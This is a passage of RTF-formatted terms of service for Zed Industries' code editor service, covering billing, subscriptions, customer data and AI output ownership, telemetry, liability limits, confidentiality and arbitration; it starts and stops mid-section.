Taxes\par} +{\pard \ql \f0 \sa180 \li0 \fi0 Customer is responsible for any sales, use, GST, value-added, withholding, or similar taxes or levies that apply to Orders, whether domestic or foreign, other than Zed\u8217's income tax (\u8220"{\b Taxes}\u8221"). Fees are exclusive of all Taxes. If Customer is compelled to make a deduction or set-off for any such Taxes, Customer will pay Zed such additional amounts as necessary to ensure receipt by Zed of the full amount Zed would have received but for the deduction.\par} +{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel2 \b \fs28 3.3. Authorization\par} +{\pard \ql \f0 \sa180 \li0 \fi0 Customer authorizes Zed to charge all sums for the orders that Customer makes, the level of Service that Customer selects, and Customer\u8217's submission of prompts or other Customer Data (defined below) to the Service to generate Output (defined below) as described in these Terms or published by Zed, including all applicable taxes, to the payment method specified in Customer\u8217's account. If Customer pays any fees with a credit card, then Zed may seek pre-authorization of Customer\u8217's credit card account prior to Customer\u8217's purchase to verify that the credit card is valid and has the necessary funds or credit available to cover Customer\u8217's purchase.\par} +{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel2 \b \fs28 3.4. Subscription Service\par} +{\pard \ql \f0 \sa180 \li0 \fi0 The Service may include certain subscription-based plans with automatically recurring payments for periodic charges ("{\b Subscription Service}"). The "{\b Subscription Billing Date}" is the date when Customer purchases its first subscription to the Service. 
The Subscription Service will begin on the Subscription Billing Date and continue for the subscription period that Customer selects on its account (such period, the "{\b Initial Subscription Period}"), and will automatically renew for successive periods of the same duration as the Initial Subscription Period (the Initial Subscription Period and each such renewal period, each a "{\b Subscription Period}") unless Customer cancels the Subscription Service or Zed terminates it. If Customer activates a Subscription Service, then Customer authorizes Zed or its third-party payment processors to periodically charge, on a going-forward basis and until cancellation of the Subscription Service, all accrued sums on or before the payment due date. For information on the "Subscription Fee", please see Zed\u8217's pricing page at {\field{\*\fldinst{HYPERLINK "https://zed.dev/pricing"}}{\fldrslt{\ul +https://zed.dev/pricing +}}} +. Customer\u8217's\u160 ?account will be charged automatically on the Subscription Billing Date and thereafter on the renewal date of its Subscription Service for all applicable fees and taxes for the next Subscription Period. Customer must cancel its Subscription Service before it renews in order to avoid billing of the next periodic Subscription Fee to Customer\u8217's account. Zed or its third-party payment processor will bill the periodic Subscription Fee to the payment method associated with Customer\u8217's account or that Customer otherwise provides to Zed. Customer\u160 ?may cancel the Subscription Service from the account page at https://zed.dev/account or by contacting us at {\field{\*\fldinst{HYPERLINK "mailto:billing-support@zed.dev"}}{\fldrslt{\ul +billing-support@zed.dev +}}} +. {\b YOUR CANCELLATION MUST BE RECEIVED BEFORE THE RENEWAL DATE IN ORDER TO AVOID BEING CHARGED FOR THE NEXT SUBSCRIPTION PERIOD.}\par} +{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel2 \b \fs28 3.5. 
Consumption Fees\par} +{\pard \ql \f0 \sa180 \li0 \fi0 Customer\u8217's subscription to the Service may permit Customer to submit prompts or other Customer Data for the purpose of generating Output, at no additional charge for a certain number of times each month. If Customer elects to submit a volume of prompts in excess of the quantity included in its Subscription Fee, then Customer authorizes Zed to charge, and Customer will be charged, a fee for each additional prompt at the rates set forth at {\field{\*\fldinst{HYPERLINK "https://zed.dev/docs/ai/models"}}{\fldrslt{\ul +https://zed.dev/docs/ai/models +}}} +.\par} +{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel2 \b \fs28 3.6. Delinquent Accounts\par} +{\pard \ql \f0 \sa180 \li0 \fi0 Zed may suspend or terminate access to the Service, including fee-based portions of the Service, for any account for which any amount is due but unpaid. In addition to the amount due for the Service, a delinquent account will be charged with fees or charges that are incidental to any chargeback or collection of any unpaid amount, including collection fees. If your payment method is no longer valid at the time a renewal Subscription Fee is due, then Zed reserves the right to delete your account and any information or Customer Data associated with your account without any liability to Customer.\par} +{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel1 \b \fs32 4. Data\par} +{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel2 \b \fs28 4.1. 
Zed's Use of Customer Data\par} +{\pard \ql \f0 \sa180 \li0 \fi0 Customer hereby grants Zed a non-exclusive, worldwide, royalty-free, fully paid-up, non-sublicensable (except to service providers and Customer\u8217's designees), non-transferable (except as set forth in Section 15.1) right to use, copy, store, disclose, transmit, transfer, display, modify, create derivative works from, collect, access, host, or otherwise process (\u8220"{\b Process}\u8221") any materials that Customer inputs into or otherwise makes available to the Service (including prompts and other written content) (collectively, \u8220"{\b Customer Data}\u8221") solely: (a) to perform its obligations set forth in the Terms, including its Support obligations as applicable; (b) to derive and generate Telemetry (see Section 4.4); and (c) as necessary to comply with applicable Laws. Except as required by applicable Laws, Zed will not provide Customer Data to any person or entity other than Customer\u8217's designees (including pursuant to Section 7) or service providers. In the event that autocomplete suggestions are turned on, Customer understands and agrees that the Service will periodically send Customer Data in the background to an AI Provider for the purpose of generating autocomplete input suggestions in the Services. Autocomplete features can be turned off at any time, in which case Customer Data will not be sent.\par} +{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel2 \b \fs28 4.2. Customer's Ownership of Output\par} +{\pard \ql \f0 \sa180 \li0 \fi0 The Service may generate specifically for, and make available to, Customer text and written content based on or in response to Customer Data input into the Service (collectively, \u8220"{\b Output}\u8221"), including through the use of technologies that incorporate or rely upon artificial intelligence, machine learning techniques, and other similar technology and features. 
As between the Parties, to the greatest extent permitted by applicable Laws, Customer owns all Output and Zed hereby irrevocably assigns to Customer all right, title, and interest in and to the Output that Zed may possess. {\b For the avoidance of doubt, Zed and its AI Providers will not retain or use Customer Data for the purpose of improving or training the Service or any AI Provider products, except to the extent Customer explicitly opts-in on Zed\u8217's specific feature to allow training and/or such improvement (such as fine-tuning) and is solely for the benefit of Customer.}\par} +{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel2 \b \fs28 4.3. Zed's Collection of Output Rating\par} +{\pard \ql \f0 \sa180 \li0 \fi0 The Service may enable Customer, at its option, to rate or otherwise provide feedback with respect to Output generated through the Service. If Customer opts in to provide feedback concerning Output using the features of the Software or Service (e.g., by clicking an Output rating button), then Customer agrees that Zed may Process that Output and associated Customer Data for the purpose of product development and improvement (\u8220"Output Rating\u8221"). For clarity, Customer\u8217's decision to opt in to provide Output Rating is specific to the corresponding Output. Your decision to provide Output Rating with respect to one instance of Output does not give Zed the right to use any other Output for Output Rating purposes.\par} +{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel2 \b \fs28 4.4. Telemetry\par} +{\pard \ql \f0 \sa180 \li0 \fi0 Zed may collect, generate, and Process\u160 ?information, including technical logs, metrics, and data and learnings, related to the Software and Service (\u8220"{\b Telemetry}\u8221") to improve and support the Services and for other lawful business purposes. 
Customer\u160 ?may configure the Software to opt out of the collection of certain Telemetry Processed\u160 ?locally by the Software itself, but Zed may still collect, generate, and Process Telemetry on Zed\u8217's servers. Zed may not disclose Telemetry to any third-party other than Zed\u8217's Representatives unless it is de-identified so that it does not identify Customer as the source thereof and is aggregated with data across other customers. {\b For avoidance of doubt, Telemetry expressly does not include Customer Data.}\par} +{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel1 \b \fs32 5. Customer Obligations\par} +{\pard \ql \f0 \sa180 \li0 \fi0 Customer is responsible for its Customer Data and will comply with applicable Laws when using the Service. Customer represents and warrants that it has obtained all rights, consents, and permissions necessary for Zed to Process Customer Data and exercise the rights granted to it in the Terms without violating or infringing Laws or third-party rights. Customer Data shall not contain: (a) any \u8220"protected health information\u8221" or \u8220"PHI\u8221" as defined under HIPAA (including 45 C.F.R. Parts 160 and 164); or (b) any payment card or cardholder data subject to PCI DSS (including primary account numbers, full track or chip data, CVV/CVC codes, PINs, or similar payment card security data). Customer is solely responsible for ensuring compliance with this restriction and shall be liable for, and shall indemnify Zed against, any claims, fines, or penalties arising from Customer\u8217's breach of this Section. Zed disclaims any and all liability in connection with Customer Data.\par} +{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel1 \b \fs32 6. 
Suspension of Service\par} +{\pard \ql \f0 \sa180 \li0 \fi0 Zed may immediately suspend Customer\u8217's access to any or all of the Service if: (a) Customer breaches Section 2.2 - 2.4 or Section 5; (b)\u160 ?any payments required under the Terms are overdue by 30 days or more; (c)\u160 ?changes to Laws or new Laws require that Zed suspend the Service or otherwise may impose additional liability on Zed in connection with its provision of the Service to Customer; or (d) Customer\u8217's breach of the Terms risks harm to any of Zed\u8217's other customers or the security, availability, or integrity of the Service or other services and entities. Where practicable, Zed will use reasonable efforts to provide Customer with prior notice of the suspension (email sufficing). If the issue that led to the suspension is resolved, Zed will restore Customer\u8217's access to the Service.\par} +{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel1 \b \fs32 7. Data Sharing and Third-Party Integrations\par} +{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel2 \b \fs28 7.1. Collaboration Services\par} +{\pard \ql \f0 \sa180 \li0 \fi0 Certain features of the Service may allow Customer to share data between accounts on the Service, including accounts controlled by persons and entities not associated with Customer (\u8220"{\b Collaboration Features}\u8221"). 
If Customer elects to use Collaboration Features, Customer acknowledges and agrees that Zed will, and authorizes Zed to, make available Customer Data consisting of file paths, file contents, and metadata regarding the code returned by language servers to the third parties designated by Customer, and that Zed exercises no control over, and has no liability for, the acts or omissions of such third parties (including in connection with the Customer Data).\u160 ?Currently, with the exception of the Channel notes feature, Zed does not persist any shared Customer Data beyond the designated Collaboration Feature session.\par} +{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel2 \b \fs28 7.2. Third-Party Integrations\par} +{\pard \ql \f0 \sa180 \li0 \fi0 The Service may support integration with third-party platforms, add-ons, services, or products not provided by Zed (\u8220"{\b Third-Party Platforms}\u8221"). Use of any Third-Party Platforms integrated with or made available through the Service is subject to Customer\u8217's agreement with the relevant provider and not these Terms. Zed does not control and has no liability for Third-Party Platforms, including their security, functionality, operation, availability, or interoperability with the Service. By enabling a Third-Party Platform to interact with the Service, Customer authorizes Zed to access and exchange Customer Data with such Third-Party Platform on Customer\u8217's behalf.\par} +{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel1 \b \fs32 8. Disclaimers; No Warranties by Zed\par} +{\pard \ql \f0 \sa180 \li0 \fi0 THE SOFTWARE, SERVICE, OUTPUT, AND ALL OTHER ZED SERVICES ARE PROVIDED \u8220"AS IS\u8221" AND \u8220"AS AVAILABLE\u8221". ZED, ON ITS OWN BEHALF AND ON BEHALF OF ITS SUPPLIERS AND LICENSORS, MAKES NO OTHER WARRANTIES, WHETHER EXPRESS, IMPLIED, STATUTORY, OR OTHERWISE, INCLUDING WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE, TITLE, OR NONINFRINGEMENT. 
ZED DOES NOT WARRANT THAT CUSTOMER\u8217'S\u160 ?USE OF THE SOFTWARE OR SERVICE WILL BE UNINTERRUPTED OR ERROR-FREE OR THAT IT WILL MAINTAIN CUSTOMER DATA WITHOUT LOSS. ZED IS NOT LIABLE FOR DELAYS, FAILURES, OR PROBLEMS INHERENT IN USE OF THE INTERNET AND ELECTRONIC COMMUNICATIONS OR OTHER SYSTEMS OUTSIDE OF ZED\u8217'S CONTROL.\u160 ?ZED IS\u160 ?NOT RESPONSIBLE FOR ANY DAMAGE THAT MAY RESULT FROM THE SOFTWARE OR SERVICE OR OUTPUT OR CUSTOMER\u8217'S\u160 ?DEALING WITH ANY OTHER SERVICE USER. Without limiting the foregoing, Customer\u160 ?acknowledges\u160 ?and agrees\u160 ?that: (a) the Service may produce inaccurate or erroneous Output; (b) Customer is\u160 ?responsible for independently evaluating the Output and any other information Customer\u160 ?receives\u160 ?from the Service; and (c) due to the nature of the Service and artificial intelligence technologies generally, Output may not be unique and other users of the Service may receive output from the Service that is similar or identical to the Output (and, notwithstanding anything to the contrary, such similar or identical output will not be understood to be Output).\par} +{\pard \ql \f0 \sa180 \li0 \fi0 THE LIMITATIONS, EXCLUSIONS AND DISCLAIMERS IN THIS SECTION\u160 ?8 (DISCLAIMERS; NO WARRANTIES BY\u160 ?ZED)\u160 ?APPLY TO THE FULLEST EXTENT PERMITTED BY LAW. Zed does not disclaim any warranty or other right that Zed is prohibited from disclaiming under applicable law.\par} +{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel1 \b \fs32 9. Term, Termination, and Modification of the Service\par} +{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel2 \b \fs28 9.1. Term\par} +{\pard \ql \f0 \sa180 \li0 \fi0 These Terms are effective beginning when Customer\u160 ?accepts\u160 ?the Terms or first downloads, installs, accesses, or uses\u160 ?the Service, and ending when terminated as described in Section 9.2 (Termination).\par} +{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel2 \b \fs28 9.2. 
Termination\par} +{\pard \ql \f0 \sa180 \li0 \fi0 If Customer\u160 ?violates\u160 ?any provision of these Terms, then Customer is\u160 ?not authorized to access the Service and these Terms automatically terminate. In addition, Zed may, at its sole discretion, terminate these Terms or Customer\u8217's\u160 ?account on the Service, or suspend or terminate Customer\u8217's\u160 ?access to the Service, at any time for any reason or no reason, with or without notice, and without any liability to Customer\u160 ?arising from such termination. Customer\u160 ?may terminate its\u160 ?account and these Terms at any time by contacting Zed\u160 ?at {\field{\*\fldinst{HYPERLINK "mailto:hi@zed.dev"}}{\fldrslt{\ul +hi@zed.dev +}}} +.\par} +{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel2 \b \fs28 9.3. Effect of Termination\par} +{\pard \ql \f0 \sa180 \li0 \fi0 Upon termination of these Terms: a) Customer\u8217's\u160 ?license to access and use the Service will terminate and Customer\u160 ?must immediately cease all use of the Service; b) Customer\u160 ?will no longer be authorized to access its\u160 ?account or the Service; c) Customer\u160 ?must pay Zed any unpaid amount that was due prior to termination; and d) all payment obligations accrued prior to termination and Section(s)\u160 ?2.4 (Restrictions), 3 (General Payment Terms) with the exception of 3.4 (Subscription Service), 4.2\u160 ?(Customer\u8217's Ownership of Output), 4.4 (Telemetry), 8 (Disclaimers; No Warranties by Zed), 9.3 (Effect of Termination), 10 (Ownership; Feedback), 11 (Limitations of Liability), 12 (Indemnity), 15\u160 ?(Governing Law, Dispute Resolution and Arbitration); and 16 (General Terms), will survive. If Customer\u8217's account has been terminated for a breach of these Terms, then Customer is\u160 ?prohibited from creating a new account on the Service.\par} +{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel2 \b \fs28 9.4. 
Modification of the Service\par} +{\pard \ql \f0 \sa180 \li0 \fi0 Zed reserves the right to modify or discontinue all or any portion of the Service at any time (including by limiting or discontinuing certain features of the Service), temporarily or permanently, without notice to Customer. Zed will have no liability to Customer\u160 ?for any change to the Service.\par} +{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel1 \b \fs32 10. Ownership; Feedback\par} +{\pard \ql \f0 \sa180 \li0 \fi0 Neither Party grants the other Party any rights or licenses not expressly set out in the Terms. Except as expressly provided in the Terms, as between the Parties, Customer retains all intellectual property rights and other rights in and to the Customer Data and Output. Except for the rights and licenses granted in the Terms, Zed and its licensors retain all intellectual property rights in and to the Service and Software. To the extent Customer provides Zed with feedback (including suggestions and comments for enhancements or new functionality) regarding the Service or Software, Output, or Zed\u8217's products, services, or other technology (\u8220"{\b Feedback}\u8221"), Zed has the full and unrestricted right (but no obligation) to use or incorporate Feedback in any manner, including to improve and develop any of its products, services, technology, or other materials without attribution to Customer.\par} +{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel1 \b \fs32 11. 
Limitations of Liability\par} +{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel2 \b \fs28 11.1.\par} +{\pard \ql \f0 \sa180 \li0 \fi0 TO THE FULLEST EXTENT PERMITTED BY LAW, IN NO EVENT WILL THE ZED ENTITIES BE LIABLE TO CUSTOMER FOR ANY INDIRECT, INCIDENTAL, SPECIAL, CONSEQUENTIAL, OR PUNITIVE DAMAGES (INCLUDING DAMAGES FOR LOSS OF PROFITS, GOODWILL, OR ANY OTHER INTANGIBLE LOSS) ARISING OUT OF OR RELATING TO YOUR ACCESS TO OR USE OF, OR YOUR INABILITY TO ACCESS OR USE, THE SERVICE OR ANY MATERIALS OR CONTENT ON THE SERVICE, WHETHER BASED ON WARRANTY, CONTRACT, TORT (INCLUDING NEGLIGENCE), STATUTE, OR ANY OTHER LEGAL THEORY, AND WHETHER OR NOT ANY ZED ENTITY HAS BEEN INFORMED OF THE POSSIBILITY OF DAMAGE.\par} +{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel2 \b \fs28 11.2.\par} +{\pard \ql \f0 \sa180 \li0 \fi0 TO THE FULLEST EXTENT PERMITTED BY LAW, THE AGGREGATE LIABILITY OF THE ZED ENTITIES TO CUSTOMER FOR ALL CLAIMS ARISING OUT OF OR RELATING TO THE USE OF OR ANY INABILITY TO USE ANY PORTION OF THE SERVICE, OR OTHERWISE ARISING UNDER THESE TERMS, WHETHER IN CONTRACT, TORT, OR OTHERWISE, IS LIMITED TO THE GREATER OF: \u160 ?THE AMOUNT CUSTOMER HAS PAID TO ZED FOR ACCESS TO AND USE OF THE SERVICE IN THE 12 MONTHS PRIOR TO THE EVENT OR CIRCUMSTANCE GIVING RISE TO THE CLAIM OR US$100.\par} +{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel2 \b \fs28 11.3.\par} +{\pard \ql \f0 \sa180 \li0 \fi0 EACH PROVISION OF THESE TERMS THAT PROVIDES FOR A LIMITATION OF LIABILITY, DISCLAIMER OF WARRANTIES, OR EXCLUSION OF DAMAGES IS INTENDED TO AND DOES ALLOCATE THE RISKS BETWEEN THE PARTIES UNDER THESE TERMS. THIS ALLOCATION IS AN ESSENTIAL ELEMENT OF THE BASIS OF THE BARGAIN BETWEEN THE PARTIES. EACH OF THESE PROVISIONS IS SEVERABLE AND INDEPENDENT OF ALL OTHER PROVISIONS OF THESE TERMS. 
THE LIMITATIONS IN THIS SECTION\u160 ?11 (LIMITATION OF LIABILITY) WILL APPLY EVEN IF ANY LIMITED REMEDY FAILS OF ITS ESSENTIAL PURPOSE.\par} +{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel1 \b \fs32 12. Indemnity\par} +{\pard \ql \f0 \sa180 \li0 \fi0 To the fullest extent permitted by law, Customer is responsible for its use of the Service, and Customer will defend and indemnify Zed, its affiliates, and their respective shareholders, directors, managers, members, officers, employees, consultants, and agents (together, the "Zed Entities") from and against every claim brought by a third party, and any related liability, damage, loss, and expense, including attorneys' fees and costs, arising out of or connected with: (1) Customer\u8217's unauthorized use of, or misuse of, the Service; (2) the Customer Data; (3) Customer\u8217's use of Output; (4) Customer\u8217's violation or alleged violation of any portion of these Terms, any representation, warranty, or agreement referenced in these Terms, or any applicable law or regulation; (5) Customer\u8217's violation or alleged violation of any third-party right, including any intellectual property right or publicity, confidentiality, other property, or privacy right; or (6) any dispute or issue between Customer and any third party. Zed reserves the right, at Zed\u8217's own expense, to assume the exclusive defense and control of any matter otherwise subject to indemnification by Customer (without limiting Customer\u8217's indemnification obligations with respect to that matter), and in that case, Customer agrees to cooperate with our defense of those claims.\par} +{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel1 \b \fs32 13. Confidentiality\par} +{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel2 \b \fs28 13.1. 
Definition\par} +{\pard \ql \f0 \sa180 \li0 \fi0 \u8220"{\b Confidential Information}\u8221" means information disclosed to the receiving Party (\u8220"{\b Recipient}\u8221") under the Terms that is designated by the disclosing Party (\u8220"{\b Discloser}\u8221") as proprietary or confidential or that should be reasonably understood to be proprietary or confidential due to its nature and the circumstances of its disclosure. Zed\u8217's Confidential\u160 ?Information\u160 ?includes the terms and conditions of the Terms and the Service (including any technical or performance information about the Service).\par} +{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel2 \b \fs28 13.2. Obligations\par} +{\pard \ql \f0 \sa180 \li0 \fi0 As Recipient, each Party will: (a) hold Confidential Information in confidence and not disclose it to third parties except as permitted in the Terms, including Section 4.1; and (b) only use Confidential Information to fulfill its obligations and exercise its rights under the Terms. Recipient may disclose Confidential Information to its employees, agents, contractors, and other representatives having a legitimate need to know (including, for Zed, the subcontractors referenced in Section 16.5) (\u8220"{\b Representatives}\u8221"), provided Recipient remains responsible for its respective Representatives\u8217' compliance with this Section\u160 ?13 and such Representatives are bound by written agreements (or, in the case of professional advisers like attorneys and accountants, ethical duties) imposing confidentiality and non-use obligations no less protective than this Section 13.\par} +{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel2 \b \fs28 13.3. 
Exclusions\par} +{\pard \ql \f0 \sa180 \li0 \fi0 These confidentiality obligations do not apply to information that Recipient can document: (a) is or becomes public knowledge through no fault of Recipient or its Representatives; (b) it rightfully knew or possessed prior to receipt under the Terms; (c) it rightfully received from a third party without breach of confidentiality obligations; or (d) it independently developed without using Confidential Information.\par} +{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel2 \b \fs28 13.4. Remedies\par} +{\pard \ql \f0 \sa180 \li0 \fi0 Unauthorized use or disclosure of Confidential\u160 ?Information\u160 ?may cause substantial harm for which damages alone are an insufficient remedy. Discloser\u160 ?may seek appropriate equitable relief, in addition to other available remedies, for breach or threatened breach of this Section 13, without the \u160 ?necessity\u160 ?of posting a bond or proving actual damages.\par} +{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel2 \b \fs28 13.5. Required Disclosures\par} +{\pard \ql \f0 \sa180 \li0 \fi0 Nothing in the Terms prohibits Recipient from making disclosures, including of Customer Data and other Confidential Information, if required by Laws, subpoena, or court order, provided (if permitted by Laws) it notifies Discloser in advance and cooperates in any effort to obtain confidential treatment.\par} +{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel1 \b \fs32 14. Publicity\par} +{\pard \ql \f0 \sa180 \li0 \fi0 Neither Party may publicly announce that the Parties have entered into the Terms, except with the other Party\u8217's prior consent or as required by Laws. However, Zed may use the name, brand, or logo of Customer (or Customer\u8217's parent company) for the purpose of identifying Customer as a licensee or customer on Zed\u8217's website or in other promotional materials. 
Zed will cease further use at Customer\u8217's written request.\par} +{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel1 \b \fs32 15. Governing Law, Dispute Resolution and Arbitration\par} +{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel2 \b \fs28 15.1. Governing Law, Jurisdiction and Venue\par} +{\pard \ql \f0 \sa180 \li0 \fi0 The Terms are governed by the laws of the State of Delaware and the United States without regard to conflicts of laws provisions that would result in the application of the laws of another jurisdiction and without regard to the United Nations Convention on the International Sale of Goods. The parties further agree that except as stated below in the Arbitration provision, and for any claims under Section 15.2 (b), each party irrevocably consents to the exclusive jurisdiction and venue of the state and federal courts located in New Castle County, Delaware, for any action arising out of or relating to these Terms, and waive any objection based on venue or forum non conveniens. ANY CAUSE OF ACTION OR CLAIM CUSTOMER MAY HAVE ARISING OUT OF OR RELATING TO THESE TERMS MUST BE COMMENCED WITHIN ONE (1) YEAR AFTER THE CAUSE OF ACTION OR CLAIM ACCRUES, OTHERWISE, SUCH CAUSE OF ACTION OR CLAIM IS PERMANENTLY BARRED.\par} +{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel2 \b \fs28 15.2. Dispute Resolution and Arbitration\par} +{\pard \ql \f0 \sa180 \li0 \fi0 ANY CONTROVERSY OR CLAIM ARISING OUT OF OR RELATING TO THESE TERMS, OR THE BREACH THEREOF, SHALL BE SETTLED BY ARBITRATION AND JUDGMENT ON THE AWARD RENDERED BY THE ARBITRATOR MAY BE ENTERED IN ANY COURT HAVING JURISDICTION THEREOF. IF THERE IS A DISPUTE ABOUT WHETHER THIS ARBITRATION AGREEMENT CAN BE ENFORCED OR APPLIES TO THE DISPUTE, CUSTOMER AND ZED AGREE THAT THE ARBITRATOR WILL DECIDE THAT ISSUE.\par} +{\pard \ql \f0 \sa180 \li0 \fi0 {\b a. 
Opt-Out.} If Customer does not wish to resolve disputes by binding arbitration, Customer may opt out of the provisions of this Section 15.2 (Dispute Resolution and Arbitration) within 30 days after the date that Customer agrees to these Terms by sending an email to {\field{\*\fldinst{HYPERLINK "mailto:arbitration-opt-out@zed.dev"}}{\fldrslt{\ul +arbitration-opt-out@zed.dev +}}} +\u160 ?or a letter to Zed Industries, Inc., Attention: Legal Department \u8211- Arbitration Opt-Out, 2590 Welton Street, Suite 200, PMB 1916, Denver, CO 80205 that specifies: Customer\u8217's full legal name, the email address associated with Customer\u8217's account on the Service, and a statement that Customer wishes to opt out of arbitration (\u8220"{\b Opt-Out Notice}\u8221"). Once Zed receives Customer\u8217's Opt-Out Notice, this Section 15.2 (Dispute Resolution and Arbitration) will be void and any action arising out of these Terms will be resolved as set forth in Section 15.1 (Governing Law). The remaining provisions of these Terms will not be affected by Customer\u8217's Opt-Out Notice.\par} +{\pard \ql \f0 \sa180 \li0 \fi0 {\b b. Pre-Arbitration Dispute Resolution and Notification.} Prior to initiating an arbitration, Customer and Zed each agree to notify the other party of the dispute and attempt to negotiate an informal resolution to it first. Zed will contact Customer at the email address Customer has provided to Zed; Customer can contact Zed by email at\u160 ?{\field{\*\fldinst{HYPERLINK "mailto:legal@zed.dev"}}{\fldrslt{\ul +legal@zed.dev +}}} +. If after a good faith effort to negotiate, one party feels the dispute has not and cannot be resolved informally, the party intending to pursue arbitration agrees to notify the other party via email prior to initiating the arbitration.\par} +{\pard \ql \f0 \sa180 \li0 \fi0 {\b c. 
Exceptions to Arbitration.} Customer and Zed each agree that the following claims are exceptions to arbitration and will be brought in a judicial proceeding in a court of competent jurisdiction: (i) Any claim related to actual or threatened infringement, misappropriation or violation of a party\u8217's copyrights, trademarks, trade secrets, patents, or other intellectual property rights; or (ii) Any claim seeking emergency injunctive relief based on exigent circumstances (e.g., imminent danger or commission of a crime, hacking, cyber-attack).\par} +{\pard \ql \f0 \sa180 \li0 \fi0 {\b d. Arbitration Rules.} (1) If Customer is domiciled in the U.S. - Any controversy or claim arising out of or relating to this contract, or the breach thereof, shall be settled by arbitration administered by the American Arbitration Association in accordance with its Commercial Arbitration Rules, and judgment on the award rendered by the arbitrator may be entered in any court having jurisdiction thereof.\u160 ?(2)\u160 ?If Customer is domiciled internationally outside the U.S. - Any controversy or claim arising out of or relating to this contract, or the breach thereof, shall be determined by arbitration administered by the International Centre for Dispute Resolution in accordance with its International Arbitration Rules.\par} +{\pard \ql \f0 \sa180 \li0 \fi0 {\b e. Modification to AAA Rules - Arbitration Hearing/Location.} Customer agrees that any required arbitration hearing will be conducted in the English language by one (1) mutually agreed upon arbitrator, (a) in city/county and state of Customer\u8217's headquarters unless both parties agree otherwise; and appearances may be made via telephonic or video hearing; and (b) for any claim or counterclaim under $25,000, by solely the submission of documents to the arbitrator.\par} +{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel2 \b \fs28 15.3. 
Waiver of Jury Trial and Class Action Waiver\par} +{\pard \ql \f0 \sa180 \li0 \fi0 EACH PARTY HEREBY IRREVOCABLY WAIVES ALL RIGHT TO TRIAL BY JURY IN ANY ACTION, SUIT, PROCEEDING, CLAIM, OR COUNTERCLAIM ARISING OUT OF OR RELATING TO THESE TERMS. CUSTOMER AND ZED EACH AGREE THAT ANY SUIT, PROCEEDING, OR OTHER ACTION ARISING OUT OF OR RELATED TO THESE TERMS WILL BE CONDUCTED ONLY ON AN INDIVIDUAL BASIS AND NOT IN A CLASS, CONSOLIDATED OR REPRESENTATIVE ACTION.\par} +{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel1 \b \fs32 16. General Terms\par} +{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel2 \b \fs28 16.1.\par} +{\pard \ql \f0 \sa180 \li0 \fi0 These Terms, including the Privacy Policy and any other agreements expressly incorporated by reference into these Terms, are the entire and exclusive understanding and agreement between Customer and Zed regarding your use of the Service. Customer\u160 ?may not assign or transfer these Terms or its rights under these Terms, in whole or in part, by operation of law or otherwise, without Zed\u8217's prior written consent. Zed may assign these Terms and all rights granted under these Terms at any time without notice or consent. The failure to require performance of any provision will not affect Zed\u8217's right to require performance at any other time after that, nor will a waiver by Zed of any breach or default of these Terms, or any provision of these Terms, be a waiver of any subsequent breach or default or a waiver of the provision itself. Use of Section\u160 ?headers in these Terms are for convenience only and will not have any impact on the interpretation of any provision. 
Throughout these Terms the use of the word \u8220"including\u8221" means \u8220"including but not limited to.\u8221" If any part of these Terms are held to be invalid or unenforceable, then the unenforceable part will be given effect to the greatest extent possible, and the remaining parts will remain in full force and effect.\par} +{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel2 \b \fs28 16.2. Notices\par} +{\pard \ql \f0 \sa180 \li0 \fi0 Except as set out in the Terms, any notice or consent under the Terms must be in writing to the Customer email address on the Order and Customer shall send all notices to Zed at Zed Industries, Inc., 2590 Welton Street, Suite 200, PMB 1916, Denver, CO 80205 with cc: to {\field{\*\fldinst{HYPERLINK "mailto:legal@zed.dev"}}{\fldrslt{\ul +legal@zed.dev +}}} +\u160 ?and will be deemed given: (a) upon receipt if by personal delivery; (b) upon receipt if by certified or registered U.S. mail (return receipt requested); or (c) one day after dispatch if by a commercial overnight delivery service. Either Party may update its address with notice to the other Party pursuant to this Section. Zed may also send operational notices to Customer\u160 ?by email or through the Service.\par} +{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel2 \b \fs28 16.3. DPA\par} +{\pard \ql \f0 \sa180 \li0 \fi0 The terms of the Data Processing Agreement (\u8220"{\b DPA}\u8221"), available upon request, are incorporated into these Terms by reference.\par} +{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel2 \b \fs28 16.4. Modification of Terms\par} +{\pard \ql \f0 \sa180 \li0 \fi0 Zed may, from time to time, change these Terms. Please check these Terms periodically 